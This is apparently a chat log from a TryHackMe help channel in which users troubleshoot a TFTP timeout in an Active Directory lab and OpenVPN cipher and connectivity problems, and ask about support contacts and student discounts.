Hi there, I am doing the "Breaching Active Directory" network and am on Task 6. I have connected to the JUMP server and am trying to retrieve the bcd file from the mdt server, but the tftp command hangs for about a minute and then says "Connect Request Failed"
I've confirmed I can ping the mdt server from the jmp server.
Is the tftp service maybe not running?

welp

best to check in #breaching-ad , but that tftp server can take some time to download that large file

Cheers, this is just he initial conf file that is small, but I'll head there see if someone knows

can you show a more zoomed in picture of the openvpn error? also are you sure that there's not multiple instances running, check with this if there's multiple ones
ip a should give only one tun0 interface
ps aux | grep openvpn should only be two processes

Run this script
sed -i 's/cipher AES-256-CBC/data-ciphers AES-256-CBC/' *.ovpn

I don't see a ciphers error

first line

weird, thought it'd be at the bottom

also run the openvpn command with sudo

yep that was the problem

cheers

you're welcome

rep @celest wadi

+rep @pastel tinsel

Gave +1 Rep to @pastel tinsel

+rep @celest wadi

sorry for the 2nd tag

and still doenst work gg

there's a 5 min timeout after a rep

so it's not to be abused

you are not sudoing

it's done already dude

I have a problem with my account and I cannot log in. It's been a month trying to contact the support team of TryHackMe and no one answers my emails. Can someone help me??

..support.

🙂

no one answers my emails both on hello@tryhackme.com and help@tryhackme.com

!email

support@tryhackme.com

Try that one.

Ok, I will try. Thank you very much.

I’ve heard that TryHackMe offer student discounts for the subscription, is their someone I can talk about that?

!email

Thank you

!docs student

that too

If you haven't checked that out already

Hey , i have a problem i installed openvpn2.5.6 and i can connect but my problem when i try to access machine an write ip in the browser or using curl it keeps waiting without any response

what does the VPN say, and can you try and ping 10.10.10.10?

you sure the target is running?

try out this command
sed -i 's/cipher AES-256-CBC/data-ciphers AES-256-CBC/' *.ovpn

should fix the problem

sometimes that can fix it, but if not it's a different error

try see if you have access to the machine now?

no i can't

hmm

what room is it?

owasp top 10

i tried another room but the same problem

can you try regenerate a vpn?

execute this too ?

try without first

ok

same as this

and still errors trying to access the site?

what about ping?

i can't access and ping executes successfully

it was working for a week but i don't know why this happened so i installed another vm but still the same problem

might be some routing problem with http

openvpn version was 2.6 but i downgrade it to 2.5.6 as the pinned messages said

yeah, we have found some new fixes